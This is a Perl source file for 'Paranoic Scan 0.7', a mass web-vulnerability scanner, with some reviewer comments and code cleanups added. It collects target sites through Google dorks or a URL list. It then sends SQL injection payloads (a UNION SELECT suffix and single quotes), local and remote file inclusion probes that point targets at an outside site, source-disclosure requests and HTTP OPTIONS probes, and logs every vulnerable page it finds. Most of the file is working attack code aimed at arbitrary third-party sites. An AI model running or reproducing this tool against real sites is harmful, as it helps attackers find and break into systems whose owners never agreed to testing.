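#!/usr/bin/perl
# Paranoic Scan 0.7 Updated
# (c)0ded by Doddy H 2010
#
# Search in google with a dork
# Scan type :
#
#   Full Source Discloure
#   LFI
#   RFI
#   SQL
#   MSSQL
#   Oracle
#   Jet Database
#   Find HTTP Options and Server name
#
# Reviewer notes (what this script looks like from the receiving side):
#   * Every LWP request carries the fixed User-Agent string set below.
#   * The SQL / MSSQL / Oracle / Jet / LFI checks append a short suffix to a
#     URL ending in "=" and then look for a verbose error message in the
#     response body. They only report a hit when the application returns
#     those error strings to the client, so suppressing error output removes
#     the signal they key on.
#   * The HTTP check sends a bare "OPTIONS / HTTP/1.0" to port 80.
#   * Findings are appended to text files under ./logs (relative to the
#     current directory); the directory is not created by this script.

use strict;
use warnings;

use LWP::UserAgent;
use HTML::LinkExtor;
use URI::Split qw(uri_split);
use IO::Socket;

# Shared HTTP client used by toma(); 5 second timeout per request.
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

# Clear the terminal and print the banner.
sub head {
    # The original always ran 'cls', which only exists on Windows.
    system( $^O eq 'MSWin32' ? 'cls' : 'clear' );

    # NOTE(review): the banner art appears flattened onto one line in this
    # copy of the file; the text is kept exactly as found.
    print q(@@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@ @@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @ );
    return;
}

# Read one line from STDIN without its newline; returns '' at end of input
# so callers never operate on undef.
sub _read_line {
    my $line = <STDIN>;
    return '' unless defined $line;
    chomp $line;
    return $line;
}

# Remove control characters from text that came from a file, a search
# result, or a remote server before it is shown on the terminal or written
# to a log, so embedded escape sequences or line breaks cannot alter either.
sub _printable {
    my ($text) = @_;
    $text = '' unless defined $text;
    $text =~ s/[\x00-\x1f\x7f]//g;
    return $text;
}

# Print a finding (with the terminal bell, as the original did) and append
# the page to the given log file.
sub _report {
    my ( $label, $logfile, $page ) = @_;
    my $shown = _printable($page);
    print "[+] $label : $shown\a\n";
    savefile( $logfile, $shown );
    return;
}

# Top-level menu: [a] scans URLs read from a file, [b] collects URLs from a
# search first. Any other input shows the menu again.
sub menu {
    while (1) {
        head();
        print "[a] : Scan a File\n";
        print "[b] : Search in google and scan the webs\n\n";
        print "[option] : ";

        # The original recursed into itself on unknown input, which never
        # terminates once STDIN is closed; stop at end of input instead.
        return if eof(STDIN);
        my $op = _read_line();

        if ( $op =~ /a/i ) {
            print "\n[+] Wordlist : ";
            my $word    = _read_line();
            my @paginas = repes( cortar( savewords($word) ) );
            my $option  = men();
            print "\n\n[+] Open File\n";
            scan( $option, @paginas );
            return;
        }
        elsif ( $op =~ /b/i ) {
            print "\n[+] Dork : ";
            my $dork = _read_line();
            print "[+] Pages : ";
            my $pag    = _read_line();
            my $option = men();
            print "\n\n[+] Searching in google\n";
            my @paginas = google( $dork, $pag );
            scan( $option, @paginas );
            return;
        }
    }
}

# Run the selected checks against every page.
#   $option - letters chosen in men(); matched case-insensitively, and
#             several letters may be combined.
#   @webs   - pages to check.
sub scan {
    my ( $option, @webs ) = @_;
    $option = '' unless defined $option;

    print "\n\n[Status] : Scanning\n";
    print "[Webs Count] : " . scalar(@webs) . "\n\n\n";

    for my $web (@webs) {
        if ( $option =~ /S/i )  { sql($web); }
        if ( $option =~ /L/i )  { lfi($web); }
        if ( $option =~ /R/i )  { rfi($web); }
        if ( $option =~ /F/i )  { fsd($web); }
        if ( $option =~ /M/i )  { mssql($web); }
        if ( $option =~ /J/i )  { access($web); }
        if ( $option =~ /O/i )  { oracle($web); }
        if ( $option =~ /HT/i ) { http($web); }
        if ( $option =~ /A/i ) {
            sql($web);
            mssql($web);
            access($web);
            oracle($web);
            lfi($web);
            rfi($web);
            fsd($web);
            http($web);
        }
    }
    return;
}

# Fetch a URL with the shared client and return the response body.
sub toma {
    return $nave->get( $_[0] )->content;
}

# Append one line of text to logs/<name>.
sub savefile {
    my ( $name, $text ) = @_;

    # Three-argument open with a lexical handle. The original ignored a
    # failed open (for example a missing logs/ directory) and silently
    # dropped the line.
    my $fh;
    unless ( open( $fh, '>>', "logs/" . $name ) ) {
        warn "[-] Cannot write logs/$name: $!\n";
        return;
    }
    print {$fh} $text . "\n";
    close $fh or warn "[-] Error closing logs/$name: $!\n";
    return;
}

# Print the credits, wait for Enter, and leave.
sub finish {
    print "\n\n\n(C) Doddy Hackman 2010\n\n";
    <STDIN>;

    # The original exited with status 1 after a normal run, which reports
    # failure to the calling shell.
    exit(0);
}

# Collect candidate pages from search result pages.
#   $dork - search expression, placed in the query string as typed.
#   $max  - highest "start" offset to request; offsets go 10, 20, ... $max.
# Returns the de-duplicated list produced by repes(cortar(...)).
sub google {
    my ( $dork, $max ) = @_;
    $dork = '' unless defined $dork;

    # Non-numeric input behaved as 0 in the original (no pages fetched).
    $max = 0 unless defined $max && $max =~ /\A\d+\z/;

    my ( @url, @founds );
    for ( my $pages = 10 ; $pages <= $max ; $pages += 10 ) {
        my $code = toma( "http://www.google.com.ar/search?hl=&q=" . $dork . "&start=$pages" );
        for my $link ( get_links($code) ) {
            push @url, $link if $link =~ /webcache.googleusercontent.com/;
        }
    }

    # The target address is taken from the cache link itself.
    for my $cached (@url) {
        push @founds, $2 if $cached =~ /cache:(.*?):(.*?)\+/;
    }

    return repes( cortar(@founds) );
}

# Send "OPTIONS / HTTP/1.0" to port 80 of the page's host and log the
# Server and Allow response headers to http-logs.txt.
sub http {
    my ( undef, $auth ) = uri_split( $_[0] );
    return unless defined $auth && length $auth;

    # The original used the socket without checking that the connection
    # succeeded; printing to an undefined handle is fatal.
    my $socket = IO::Socket::INET->new(
        PeerAddr => $auth,
        PeerPort => "80",
        Proto    => "tcp",
    ) or return;

    print $socket "OPTIONS / HTTP/1.0\r\n\r\n";
    my $resultado = '';
    read $socket, $resultado, 1000;

    # No /g here: with /g the second match resumed after the first one and
    # missed an Allow header that came before Server. Header values are
    # remote-controlled, so they are cleaned before being logged.
    if ( $resultado =~ /Server:(.*)/ ) {
        my $server = _printable($1);
        savefile( "http-logs.txt", "[+] Page : " . _printable($auth) . "\n" );
        savefile( "http-logs.txt", "[+] Server : " . $server . "\n" );
    }
    if ( $resultado =~ /Allow: (.*)/ ) {
        my $options = _printable($1);
        savefile( "http-logs.txt", "[+] Options : " . $options . "\n" );
    }

    $socket->close;
    return;
}

# SQL check: requests the page with a one-column UNION SELECT appended and
# reports it when the column-count error text is returned.
sub sql {
    my $page = shift;
    my ( $pass1, $pass2 ) = ( "+", "--" );
    my $code1 = toma( $page . "-1" . $pass1 . "union" . $pass1 . "select" . $pass1 . "666" . $pass2 );
    if ( $code1 =~ /The used SELECT statements have a different number of columns/i ) {
        _report( "SQLI", "sql-logs.txt", $page );
    }
    return;
}

# Jet / Access check: appends a single quote and looks for the driver's
# error text in the response.
sub access {
    my $page  = shift;
    my $code1 = toma( $page . "'" );
    if ( $code1 =~ /Microsoft JET Database/i or $code1 =~ /ODBC Microsoft Access Driver/i ) {
        _report( "Jet DB", "jetdb-logs.txt", $page );
    }
    return;
}

# MSSQL check: appends a single quote and looks for the ODBC driver error.
sub mssql {
    my $page  = shift;
    my $code1 = toma( $page . "'" );
    if ( $code1 =~ /ODBC SQL Server Driver/i ) {
        _report( "MSSQL", "mssql-logs.txt", $page );
    }
    return;
}

# Oracle check: appends a single quote and looks for the OLE DB provider
# error.
sub oracle {
    my $page  = shift;
    my $code1 = toma( $page . "'" );
    if ( $code1 =~ /Microsoft OLE DB Provider for Oracle/i ) {
        _report( "Oracle", "oracle-logs.txt", $page );
    }
    return;
}

# RFI check: appends an external address to the parameter and reports the
# page when that site's marker text shows up in the response.
sub rfi {
    my $page  = shift;
    my $code1 = toma( $page . "http:/www.supertangas.com/" );
    if ( $code1 =~ /Los mejores TANGAS de la red/i ) {    # (author's comment) This is real knowledge xDDD
        _report( "RFI", "rfi-logs.txt", $page );
    }
    return;
}

# LFI check: appends a single quote and looks for PHP's "No such file or
# directory" warning in the response.
sub lfi {
    my $page  = shift;
    my $code1 = toma( $page . "'" );
    if ( $code1 =~ /No such file or directory in <b>(.*)<\/b> on line/i ) {
        _report( "LFI", "lfi-logs.txt", $page );
    }
    return;
}

# Source disclosure check: appends the page's own path (without the leading
# slash) to the URL and looks for PHP download-header source in the reply.
sub fsd {
    my $page = shift;
    my ( undef, undef, $path ) = uri_split($page);
    if ( defined $path && $path =~ /\/(.*)$/ ) {
        my $me    = $1;
        my $code1 = toma( $page . $me );
        if ( $code1 =~ /header\((.*)Content-Disposition: attachment;/i ) {
            _report( "Full Source Discloure", "fpd-logs.txt", $page );
        }
    }
    return;
}

# Return the arguments with duplicates removed, first occurrence kept.
sub repes {
    # Lexical state: the original kept the seen-set and the result in
    # package globals, so a second call would also return the first call's
    # items.
    my ( %seen, @limpio );
    for my $item (@_) {
        push @limpio, $item unless $seen{$item}++;
    }
    return @limpio;
}

# Read every line of the named file and return them (newlines included).
sub savewords {
    my ($file) = @_;
    $file = '' unless defined $file;

    # Three-argument open: with the original two-argument form a file name
    # typed at the prompt that begins with ">" or ends with "|" is treated
    # as a write mode or a command rather than a name.
    my $fh;
    unless ( open( $fh, '<', $file ) ) {
        warn "[-] Cannot open $file: $!\n";
        return;
    }
    my @words = <$fh>;
    close $fh;
    return @words;
}

# Show the scan-type menu and return what the user typed.
sub men {
    print "\n\n[+] Scan Type : \n\n";
    print "[S] : SQL\n";
    print "[M] : MSSQL\n";
    print "[J] : Jet Database\n";
    print "[O] : Oracle\n";
    print "[L] : LFI\n";
    print "[R] : RFI\n";
    print "[F] : Full Source Discloure\n";
    print "[HT] : HTTP Information\n";
    print "[A] : All\n\n";
    print "\n[Options] : ";
    return _read_line();
}

# Cut each item after its first "=" and return "<part before>=".
sub cortar {
    my @nuevo;
    for my $item (@_) {
        my ($head) = split( "=", $item );

        # split yields nothing for an empty string.
        $head = '' unless defined $head;
        push @nuevo, $head . "=";
    }
    return @nuevo;
}

# Return every link attribute value HTML::LinkExtor finds in the markup.
sub get_links {
    # Collected per call; the original pushed into a package global through
    # a nested named sub, so each call also returned earlier pages' links.
    my @links;
    my $parser = HTML::LinkExtor->new(
        sub {
            my ( $tag, %attr ) = @_;
            push @links, values %attr;
        }
    );
    $parser->parse( $_[0] );
    return @links;
}

# Program flow: menu (which runs the scan), then the closing message.
menu();
print "\n\n[Status] : Finish\n";
finish();

# ¿ The End ?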